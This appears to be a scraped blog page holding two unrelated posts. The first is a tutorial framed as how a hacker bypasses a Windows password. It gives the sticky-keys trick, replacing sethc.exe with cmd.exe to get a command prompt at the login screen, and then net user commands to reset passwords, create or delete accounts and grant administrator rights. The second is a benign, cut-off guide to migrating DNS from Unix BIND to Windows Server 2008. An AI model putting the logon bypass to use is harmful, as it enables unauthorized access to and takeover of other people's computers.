Bypass Windows Logon

A quick, simple tutorial on how a hacker can bypass your Windows password using easily available software from the internet.

This video below will show you how to hack windows xp, vista and windows 7

Here also another video, how to do it on Windows 7

Helpful command prompt :-

Please backup file  “sethc.exe” before copy this.  To copy =>  copy cmd.exe to sethc.exe :- ‘sethc.exe’ is a sticky key popup menu (by pressing sticky key – press shift 5x). What it will do is replace it with command prompt so that after pressing shift key 5 times command prompt will be execute instead of sticky popup. Click ‘yes’ after sticky key apear..

To view user =>   net user or  net user User :- to view user account or profile details.

Change user password=> net user User pwd123 :- User is name of user profile or account and pwd123 is the password.

To add user => net user /add User or  net user User /add :- User is  name of user account or profile you wish to add.

To delete user => net user /delete User or net user User /delete  :- User is  name of user account or profile you wish to delete.

Set your User account or profile as Administrator authority=> net localgroup administrators User /add :- User is your user account or profile name you wish to add.

By Testingunderground Posted in New

Migrate the DNS from Unix to Windows

Ever needed to replace an older Unix DNS server with a new Windows 2008 server ? Here is a simple guide on how to migrate the DNS from Unix to Windows without too much effort.

DNS Migration Perquisites

It is a best practice to perform this migration as a transition and run both DNS servers in parallel until your new server is fully functional and you can safely remove the old server.

Before you start the actual DNS migration, you need to prepare both servers for the migration. First, on the Windows system make sure the server you are migrating to is fully patched and it has a fixed IP address. Then, depending on your network configuration you will need to tell your clients that a secondary DNS server exists and they should ask both servers when resolving DNS requests. If your clients are configured by DHCP (which is the best practice) then you will just have to add the Windows DNS server. In the DHCP server configurations please add the Windows server as secondary DNS server. Then you will need to configure the Unix BIND service to allow zone transfers to your newly installed Windows DNS Server.

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